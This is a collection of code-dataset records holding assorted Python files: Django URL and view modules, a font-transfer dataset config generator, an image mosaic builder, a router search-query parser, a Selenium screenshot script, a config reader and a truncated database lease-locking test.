"line_number": 359, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 359, "usage_type": "call"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pybass.seconds_to_string", "line_number": 374, "usage_type": "call"}, {"api_name": "pybass.stream_length_as_hms", "line_number": 378, "usage_type": "call"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 391, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ACTIVE_PAUSED", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelPlay", "line_number": 396, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 397, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 397, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelPause", "line_number": 403, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 404, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 404, "usage_type": "call"}, {"api_name": "pybass.BASS_SetVolume", "line_number": 410, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelStop", "line_number": 430, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 431, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 431, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_MUSIC_MOD", "line_number": 438, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MusicFree", "line_number": 439, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 440, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 440, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_STREAM", "line_number": 443, "usage_type": "attribute"}, {"api_name": "pybass.BASS_StreamFree", "line_number": 444, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 445, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 445, "usage_type": "call"}, {"api_name": "pybassmidi.BASS_MIDI_FontFree", "line_number": 457, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 458, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 458, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginFree", "line_number": 461, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 462, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 462, "usage_type": "call"}, {"api_name": "locale.setlocale", "line_number": 475, "usage_type": "call"}, {"api_name": "locale.LC_ALL", "line_number": 475, "usage_type": "argument"}, {"api_name": "wx.TextCtrl", "line_number": 477, "usage_type": "attribute"}, {"api_name": "wx.Frame", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 513, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 513, "usage_type": "attribute"}, {"api_name": "wx.TE_MULTILINE", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 516, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.LogTextCtrl", "line_number": 518, "usage_type": "call"}, {"api_name": "wx.LOG_Error", "line_number": 519, "usage_type": "attribute"}, 
{"api_name": "wx.lib.agw.aui.AuiManager", "line_number": 528, "usage_type": "call"}, {"api_name": "wx.lib.agw.aui.AuiPaneInfo", "line_number": 530, "usage_type": "call"}, {"api_name": "wx.lib.agw.aui.AuiPaneInfo", "line_number": 531, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 553, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 555, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 556, "usage_type": "call"}, {"api_name": "os.path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 556, "usage_type": "attribute"}, {"api_name": "locale.getdefaultlocale", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 569, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 570, "usage_type": "call"}, {"api_name": "os.path", "line_number": 570, "usage_type": "attribute"}, {"api_name": "gettext.GNUTranslations", "line_number": 574, "usage_type": "call"}, {"api_name": "gettext.NullTranslations", "line_number": 583, "usage_type": "call"}, {"api_name": "wx.Locale", "line_number": 587, "usage_type": "call"}, {"api_name": "wx.LANGUAGE_DEFAULT", "line_number": 587, "usage_type": "attribute"}, {"api_name": "wx.GetUserId", "line_number": 589, "usage_type": "call"}, {"api_name": "wx.SingleInstanceChecker", "line_number": 591, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 593, "usage_type": "call"}, {"api_name": "wx.html.HtmlHelpController", "line_number": 597, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 598, "usage_type": "call"}, {"api_name": "os.path", "line_number": 598, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 608, "usage_type": "attribute"}]} +{"seq_id": "136093426", "text": "from django.urls import path\nfrom basic_app import views\n\napp_name = 'basic_app'\n\nurlpatterns = [\n path('student/', views.student, name='student'),\n path('teacher/', views.teacher, name='teacher'),\n path('form_page/', views.form_name_view, name='form')\n]", "sub_path": "school/basic_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "basic_app.views.student", "line_number": 7, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "basic_app.views.teacher", "line_number": 8, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "basic_app.views.form_name_view", "line_number": 9, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "505703618", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#########################################################\n# Create on 2018-07-10\n#\n# Author: jiean001\n#\n# 生成数据集的配置文件\n# style_content_gt:\n# -- list\n# -- style_list\n# -- content_list\n# -- gt_list\n# -- list\n# ...\n#########################################################\n\nfrom utils.dir_util import *\nimport 
json\nimport numpy as np\n\n# mapping table between style and content\n# this table should be generated randomly; it is fixed for now\nstyle_content_related_map = {'style_name': '[content_name1, content_name2, ..., content_nameN]'}\n# standard_file = '000004'\nstandard_file = '001234'\ncontent_file_lists = [standard_file, standard_file, standard_file]\n# content_file_lists = ['000004', '000004', '000004']\n\n\n# randomly generate one character\ndef generate_one_char(file_name=None):\n if file_name:\n return '%s/%s.png' % (file_name, chr(np.random.randint(0, 26) + ord('A')))\n return '%s.png' % (chr(np.random.randint(0, 26) + ord('A')))\n\n\n# randomly generate a group of style_num style characters\ndef generate_style_pair(style_num=3, file_name=None):\n style_pair = [generate_one_char(file_name)]\n for i in range(1, style_num):\n new_char = generate_one_char(file_name)\n while new_char in style_pair:\n new_char = generate_one_char(file_name)\n style_pair.append(new_char)\n return style_pair\n\n\n# randomly generate the ground truth\ndef generate_gt(file_name=None):\n return [generate_one_char(file_name)]\n\n\n# randomly generate the content data\ndef generate_content_pair(gt_name):\n gt_name = gt_name[0]\n style_file_name, gt = os.path.split(gt_name)\n content_pair = []\n # to be changed in the next version\n # for content_file_name in style_content_related_map[style_file_name]:\n for content_file_name in content_file_lists:\n atom = gt_name.replace(style_file_name, content_file_name)\n content_pair.append(atom)\n return content_pair\n\n\n# generate one row of data\ndef generate_one_row(style_num=3, file_name=None):\n one_row = []\n style_pair = generate_style_pair(style_num=style_num, file_name=file_name)\n gt = generate_gt(file_name=file_name)\n content_pair = generate_content_pair(gt)\n one_row.append(style_pair)\n one_row.append(content_pair)\n one_row.append(gt)\n if standard_file:\n standard_style_letter = []\n for style_letter in style_pair:\n standard_style_letter.append(style_letter.replace(style_letter.split('/')[0], standard_file))\n # print(style_pair, standard_style_letter)\n one_row.append(standard_style_letter)\n return one_row\n\n\nclass Data_Config_Generate:\n def __init__(self, each_style_num=4, each_config_num=1024, style_num=3,\n dataset_name=r'Capitals_colorGrad64',\n dataset_dir=r'/home/xiongbo/datasets/SEPARATE/Capitals_colorGrad64/train/',\n config_dir=r'../config/train/',\n iterate_dir=iterate_dir, generate_one_row=generate_one_row):\n # each config file holds each_style_num * each_config_num entries\n # number of characters per style (Capitals_colorGrad64)\n self.each_style_num = each_style_num\n # number of style groups per config file\n self.each_config_num = each_config_num\n # path of the dataset\n self.dataset_dir = dataset_dir\n self.dataset_name = dataset_name\n # where the config files are stored\n self.config_dir = config_dir\n # how many entries the current config file holds\n self.crt_config_num = 0\n # index of the current config file\n self.crt_config_file_index = 0\n # number of style characters per data row\n self.style_num = style_num\n\n self.generate_one_row = generate_one_row\n\n self.create_new_cofig_file()\n # traverse the directories\n self.iterate_dir = iterate_dir\n self.iterate_dir(self.dataset_dir, deal_dir=self.deal_dir, deal_file=self.deal_file)\n self.save_to_json()\n\n def create_new_cofig_file(self):\n self.config_file = os.path.join(self.config_dir, '%s_%04d.json' %(self.dataset_name, self.crt_config_file_index))\n self.crt_config_file_index += 1\n self.crt_config_num = 0\n self.style_content_gt_list = []\n\n # generate the training data for each font\n def deal_one_font(self, style_num=4, file_name=None):\n _style_content_gt_list = [self.generate_one_row(style_num=style_num, file_name=file_name)]\n if self.each_style_num >= 26:\n s_c_g_st = _style_content_gt_list[0]\n _style_content_gt_list = []\n s, c, g, st = s_c_g_st[0], s_c_g_st[1], 
s_c_g_st[2], s_c_g_st[3]\n content = g[0][-5]\n for i in range(26):\n crt_c = []\n for _c in c:\n crt_c.append(_c.replace(content, chr(ord('A') + i)))\n crt_s_c_g_st = [s, crt_c, [g[0].replace(content, chr(ord('A') + i))], st]\n _style_content_gt_list.append(crt_s_c_g_st)\n if self.each_style_num > 26:\n for j in range(self.each_style_num - 26):\n i = 25\n crt_c = []\n for _c in c:\n crt_c.append(_c.replace(content, chr(ord('A') + i)))\n crt_s_c_g_st = [s, crt_c, [g[0].replace(content, chr(ord('A') + i))], st]\n _style_content_gt_list.append(crt_s_c_g_st)\n '''\n for i in range(each_style_num-26):\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n while s_c_g in _style_content_gt_list:\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n _style_content_gt_list.append(s_c_g)\n '''\n else:\n for i in range(1, self.each_style_num):\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n while s_c_g in _style_content_gt_list:\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n _style_content_gt_list.append(s_c_g)\n return _style_content_gt_list\n\n # save as a json file\n def save_to_json(self):\n with open(self.config_file, 'w') as f:\n json.dump(self.style_content_gt_list, f)\n print('save %s okay' % (self.config_file))\n self.create_new_cofig_file()\n\n def deal_dir(self, path):\n _, style_name = os.path.split(path)\n self.crt_config_num += 1\n self.style_content_gt_list += self.deal_one_font(style_num=self.style_num, file_name=style_name)\n # self.style_content_gt_list.append(self.deal_one_font(style_num=self.style_num, file_name=style_name))\n if self.crt_config_num == self.each_config_num:\n self.save_to_json()\n\n def deal_file(self, image_path):\n return 'pass'\n\n\nif __name__ == '__main__':\n # pc\n each_style_num = 30\n each_config_num = 500 # 1024\n style_num = 8\n dataset_name = r'Capitals_colorGrad64'\n # pc\n # dataset_dir = r'/home/xiongbo/datasets/SEPARATE/Capitals_colorGrad64/test/'\n # 93 218\n dataset_dir = r'/home/share/dataset/MCGAN/SEPARATE/Capitals_colorGrad64/train/'\n\n config_dir = r'../config/train/'\n iterate_dir = iterate_dir\n tmp = Data_Config_Generate(each_style_num=each_style_num, each_config_num=each_config_num,\n style_num=style_num, dataset_dir=dataset_dir,\n config_dir=config_dir)\n # 93\n # dataset_dir = r'/home/share/dataset/MCGAN/SEPARATE/Capitals_colorGrad64/train/'\n # tmp_93 = Data_Config_Generate(dataset_dir=dataset_dir, style_num=\n", "sub_path": "academic/reweighted_font_transfer/dataset/data_config_generate.py", "file_name": "data_config_generate.py", "file_ext": "py", "file_size_in_byte": 7700, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "384050339", "text": "import sys\nimport os\n\nfrom PIL import Image\n\n# Change these 3 config parameters to suit your needs...\nTILE_SIZE = 50 # height/width of mosaic tiles in pixels\nTILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)\nENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the 
original\n\nTILE_BLOCK_SIZE = int(TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1))\nOUT_FILE = 'mosaic.jpg'\n\n\ndef get_tile(fn):\n try:\n img = Image.open(fn)\n # tiles must be square, so get the largest square that fits inside the image\n w, h = img.size\n min_dimension = min(w, h)\n w_crop = (w - min_dimension) / 2\n h_crop = (h - min_dimension) / 2\n img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))\n\n large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), Image.ANTIALIAS)\n small_tile_img = img.resize((int(TILE_SIZE / TILE_BLOCK_SIZE), int(TILE_SIZE / TILE_BLOCK_SIZE)), Image.ANTIALIAS)\n\n return large_tile_img.convert('RGB'), small_tile_img.convert('RGB')\n except:\n return None, None\n\n\ndef get_tiles(tiles_directory):\n large_tiles = []\n small_tiles = []\n\n # search the tiles directory recursively\n for root, _, files in os.walk(tiles_directory):\n for fn in files:\n tile_path = os.path.join(root, fn)\n large_tile, small_tile = get_tile(tile_path)\n if large_tile:\n large_tiles.append(large_tile)\n small_tiles.append(small_tile)\n\n return large_tiles, small_tiles\n\n\ndef get_target_image_data(fn):\n img = Image.open(fn)\n w = img.size[0] * ENLARGEMENT\n h = img.size[1] * ENLARGEMENT\n large_img = img.resize((w, h), Image.ANTIALIAS)\n w_diff = (w % TILE_SIZE)/2\n h_diff = (h % TILE_SIZE)/2\n\n # if necesary, crop the image slightly so we use a whole number of tiles horizontally and vertically\n print(w_diff, h_diff)\n if w_diff or h_diff:\n large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))\n\n small_img = large_img.resize((int(w / TILE_BLOCK_SIZE), int(h / TILE_BLOCK_SIZE)), Image.ANTIALIAS)\n\n image_data = large_img.convert('RGB'), small_img.convert('RGB')\n return image_data\n\n\nclass TileFitter:\n def __init__(self, tiles_data):\n self.tiles_data = tiles_data\n\n def __get_tile_diff(self, t1, t2, bail_out_value):\n diff = 0\n for i in range(len(t1)):\n diff += ((t1[i][0] - t2[i][0])**2 + (t1[i][1] - t2[i][1])**2 + (t1[i][2] - t2[i][2])**2)\n if diff > bail_out_value:\n # we know already that this isnt going to be the best fit, so no point continuing with this tile\n return diff\n return diff\n\n def get_best_fit_tile(self, img_data):\n best_fit_tile_index = None\n min_diff = sys.maxsize\n tile_index = 0\n\n # go through each tile in turn looking for the best match for the part of the image represented by 'img_data'\n for tile_data in self.tiles_data:\n diff = self.__get_tile_diff(img_data, tile_data, min_diff)\n if diff < min_diff:\n min_diff = diff\n best_fit_tile_index = tile_index\n tile_index += 1\n\n return best_fit_tile_index\n\n\nclass MosaicImage:\n def __init__(self, original_img):\n self.image = Image.new(original_img.mode, original_img.size)\n self.x_tile_count = original_img.size[0] // TILE_SIZE\n self.y_tile_count = original_img.size[1] // TILE_SIZE\n\n def add_tile(self, tile_data, coords):\n img = Image.new('RGB', (TILE_SIZE, TILE_SIZE))\n img.putdata(tile_data)\n self.image.paste(img, coords)\n\n def save(self, path):\n self.image.save(path)\n\n\ndef build_mosaic(result_queue, all_tile_data_large, original_img_large):\n mosaic = MosaicImage(original_img_large)\n\n for img_coords, best_fit_tile_index in result_queue:\n tile_data = all_tile_data_large[best_fit_tile_index]\n mosaic.add_tile(tile_data, img_coords)\n\n mosaic.save(OUT_FILE)\n\n\ndef compose(original_img, tiles):\n original_img_large, original_img_small = original_img\n tiles_large, tiles_small = tiles\n\n mosaic = MosaicImage(original_img_large)\n\n 
all_tile_data_large = list(map(lambda tile: list(tile.getdata()), tiles_large))\n all_tile_data_small = list(map(lambda tile: list(tile.getdata()), tiles_small))\n\n # start the worker processes that will perform the tile fitting\n result_queue = []\n # this function gets run by the worker processes, one on each CPU core\n tile_fitter = TileFitter(all_tile_data_small)\n for x in range(mosaic.x_tile_count):\n for y in range(mosaic.y_tile_count):\n large_box = x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE\n small_box = x * TILE_SIZE/TILE_BLOCK_SIZE, y * TILE_SIZE/TILE_BLOCK_SIZE, (x + 1) * TILE_SIZE/TILE_BLOCK_SIZE, (y + 1) * TILE_SIZE/TILE_BLOCK_SIZE\n img_data, img_coords = list(original_img_small.crop(small_box).getdata()), large_box\n tile_index = tile_fitter.get_best_fit_tile(img_data)\n result_queue.append((img_coords, tile_index))\n\n # start the worker processes that will build the mosaic image\n build_mosaic(result_queue, all_tile_data_large, original_img_large)\n\n\ndef mosaic(img_path, tiles_path):\n tiles_data = get_tiles(tiles_path)\n image_data = get_target_image_data(img_path)\n compose(image_data, tiles_data)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print(f'Usage: {sys.argv[0]} \\r')\n else:\n mosaic(sys.argv[1], sys.argv[2])\n", "sub_path": "mosaic.py", "file_name": "mosaic.py", "file_ext": "py", "file_size_in_byte": 5699, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "sys.maxsize", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PIL.Image.new", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 104, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 104, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 154, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 157, "usage_type": "attribute"}]} +{"seq_id": "550726727", "text": "#!/usr/bin/python3\n\nimport bson\n\ndef format_query(query_usr):\n\tquery_list = []\n\tfor key, value in query_usr.items():\n\t\tif key == \"hostname\":\n\t\t\tqtag = \"\"\n\t\telse:\n\t\t\tqtag = \"%s:\" % key\n\t\tquery_list.append(\"%s%s\" % (qtag, value))\n\treturn \" \".join(query_list)\n\nallowed_filters = ('status', 'hood', 
'community', 'user.nickname', 'hardware.name', 'software.firmware', 'netifs.mac', 'netmon_id', 'hostname')\ndef parse_router_list_search_query(args):\n\tquery_usr = bson.SON()\n\tif \"q\" in args:\n\t\tfor word in args[\"q\"].strip().split(\" \"):\n\t\t\tif not ':' in word:\n\t\t\t\tkey = \"hostname\"\n\t\t\t\tvalue = word\n\t\t\telse:\n\t\t\t\tkey, value = word.split(':', 1)\n\t\t\tif key in allowed_filters:\n\t\t\t\tquery_usr[key] = query_usr.get(key, \"\") + value\n\tquery = {}\n\tfor key, value in query_usr.items():\n\t\tif value == \"EXISTS\":\n\t\t\tquery[key] = {\"$exists\": True}\n\t\telif value == \"EXISTS_NOT\":\n\t\t\tquery[key] = {\"$exists\": False}\n\t\telif key == 'netifs.mac':\n\t\t\tquery[key] = value.lower()\n\t\telif key == 'hostname':\n\t\t\tquery[key] = {\"$regex\": value.replace('.', '\\.'), \"$options\": 'i'}\n\t\telif key == 'hardware.name':\n\t\t\tquery[key] = {\"$regex\": value.replace('.', '\\.').replace('_', ' '), \"$options\": 'i'}\n\t\telif key == 'netmon_id':\n\t\t\tquery[key] = int(value)\n\t\telse:\n\t\t\tquery[key] = value\n\treturn (query, format_query(query_usr))\n", "sub_path": "ffmap/web/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bson.SON", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "196578378", "text": "import os\nfrom selenium import webdriver\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_driver = os.path.join('chromedriver')\n\ndriver = webdriver.Chrome(chrome_driver, options=chrome_options)\ndriver.get(\"http://ncov.mohw.go.kr/\")\ndriver.get_screenshot_as_file(\"TEST5.png\")\nelement = driver.find_element_by_class_name(\"ncov_tab_content.on\")\nelement_png = element.screenshot_as_png\nwith open('TEST5.png', \"wb\") as file:\n file.write(element_png)\n\ndriver.quit()\n", "sub_path": "test5.py", "file_name": "test5.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 4, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "308043962", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import foForm\nfrom .models import fo\ndef index(request):\n form = foForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = foForm()\n context = {\n 'form': form\n }\n return render(request, \"index.html\", context)\ndef show(request):\n name=fo.objects.order_by('title')\n context={\n 'name':name\n }\n return render(request, \"show.html\", context)\n\ndef delete(request, id):\n obj = get_object_or_404(fo, id=id)\n obj.delete()\n name=fo.objects.order_by('title')\n print(name.count())\n context={\n 'name':name\n }\n return render(request, \"show.html\", context)\n", "sub_path": "fo/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 714, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.foForm", "line_number": 5, "usage_type": "call"}, {"api_name": "forms.foForm", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "models.fo.objects.order_by", "line_number": 14, "usage_type": "call"}, {"api_name": "models.fo.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.fo", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.fo", "line_number": 21, "usage_type": "argument"}, {"api_name": "models.fo.objects.order_by", "line_number": 23, "usage_type": "call"}, {"api_name": "models.fo.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.fo", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "361286023", "text": "# -*- coding: utf-8 -*-\nimport configparser\nimport os\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nfrom openpyxl import load_workbook\n#数据加载\n# dir_path=os.path.dirname(os.path.dirname(os.path.relpath(__file__)))\n# print(dir_path)\n# config_xlsx_path=os.path.join(dir_path,'config.xlsx')\n# print(config_xlsx_path)\n# wb=load_workbook(config_xlsx_path,data_only=True)\n# wb=load_workbook('../config.xlsx',data_only=True)\n# dir_path=os.path.dirname(os.getcwd())\n# config_xlsx_path = os.path.join(dir_path, r'config.xlsx')\n# wb = load_workbook(config_xlsx_path, data_only=True)\n# sheet=wb['info']\n#\n# # 获取用户名信息\n# row_list=[]\n# pinyin=['yuqingtong_username','yuqingtong_password','dama_username','dama_password','softid','project_name','sheet_name','keywords']\n# for row in sheet.iter_rows(min_row=2,max_col=8):\n# row_info = []\n# for cell in row:\n# row_info.append(cell.value)\n# info = dict(list(zip(pinyin, row_info)))\n# row_list.append(info)\n\n\n# for data in sheet[2:5]:\n# print(type(data))\n# print(data)\n# d=dict(list(zip(pinyin,data)))\n# print(d)\n# print(row_info)\n\n# print(info)\n# USERNAME = info['yuqingtong_username']\n# PASSWORD = info['yuqingtong_password']\n\n\n\n# 获取设置的时间\ndef get_time_list():\n sheet=wb['time']\n time_data_all = sheet.iter_rows(min_row=2)\n times = []\n for row in time_data_all:\n time = {\n 'start_time':'',\n 'end_time':'',\n 'time_delay':'2'\n }\n for cell in row:\n if(cell.column==1):\n time['start_time']=cell.value\n elif(cell.column==2):\n time['end_time']=cell.value\n elif(cell.column==3):\n time['time_delay']=cell.value\n times.append(time)\n return times\n\n# USERNAME = info['yuqingtong_username']\n# PASSWORD = info['yuqingtong_password']\n# 浏览器相关\nHEAD_LESS = False\n\n# 等待时间 秒\nWAIT_TIME = 20\n\n# 时间区间内最大数据量\nMAX_DATA_COUNT = 5000\n\n# 抓取多少页后重启浏览器\nMAX_CRAWL_PAGE_COUNT = 50\n\n# 时间格式format\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n\nDATA_DIR = \"../data/\"\n\nclass redconfig():\n def __init__(self,filepath=None):\n if filepath:\n self.config_path=filepath\n else:\n self.config_path=os.path.join(os.path.dirname(os.getcwd()), 'config.ini')\n print(self.config_path)\n self.config=configparser.ConfigParser()\n self.config.read(self.config_path,encoding='utf-8')\n\n def getValueByDict(self,key,value):\n return 
self.config.get(key,value)\n\n def getDictBySection(self,section):\n return dict(self.config.items(section))\n\n\ndef print_it():\n print(\"kkk\")\n\nif __name__ == '__main__':\n myconfig=redconfig()\n # print(myconfig.getValueByDict('yqt_info','username'))\n # print(myconfig.getDictBySection('time_info'))\n # cron_info=myconfig.getDictBySection('cron_info')\n # # for key,value in cron_info.items():\n # # cron_info[key]=eval(value)\n # tigger1=CronTrigger(**cron_info)\n # print(tigger1.fields)\n # scheduler=BlockingScheduler()\n # scheduler.add_job(print_it,tigger1,max_instances=10,id='212')\n # scheduler.start()\n # test1=eval(myconfig.getValueByDict(\"crawl_condition\", \"condition\"))\n # print(type(test1))\n # print(test1)\n # for key,value in test1.items():\n # print(key,value)\n # dir_path = os.path.dirname(os.path.dirname(os.path.relpath(__file__)))\n # dir_path=os.path.dirname(os.getcwd())\n # config_xlsx_path = os.path.join(dir_path, r'config.xlsx')\n # wb = load_workbook(config_xlsx_path, data_only=True)\n\n test1 = eval(myconfig.getValueByDict(\"industry_info\", \"project_name\"))\n print(test1)\n print(type(test1))\n # for i in test1:\n print('优速测试_快消品' in test1)\n\n", "sub_path": "apscheduler_yqt/yuqingtong/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3893, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 89, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "417507022", "text": "from concurrent.futures.thread import ThreadPoolExecutor\nimport time\nimport uuid\nimport unittest\n\nfrom anchore_engine.db import db_locks, initialize, session_scope, Lease\nfrom anchore_engine.subsys import logger\nfrom anchore_engine.subsys.logger import enable_bootstrap_logging\n\nenable_bootstrap_logging()\n\nconn_str = 'postgres+pg8000://postgres:postgres@localhost:54320/postgres'\n\n\ndef init():\n config = {\n 'credentials':\n {'database':\n {'db_connect': conn_str}\n }\n }\n initialize(localconfig=config)\n\n\nclass TestLocking(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n init()\n\n def test_serial_lock(self):\n id = uuid.uuid1().hex\n id2 = uuid.uuid1().hex\n lock_id = 'testlock'\n db_locks.init_lease(lock_id)\n\n r = db_locks.acquire_lease(lock_id, 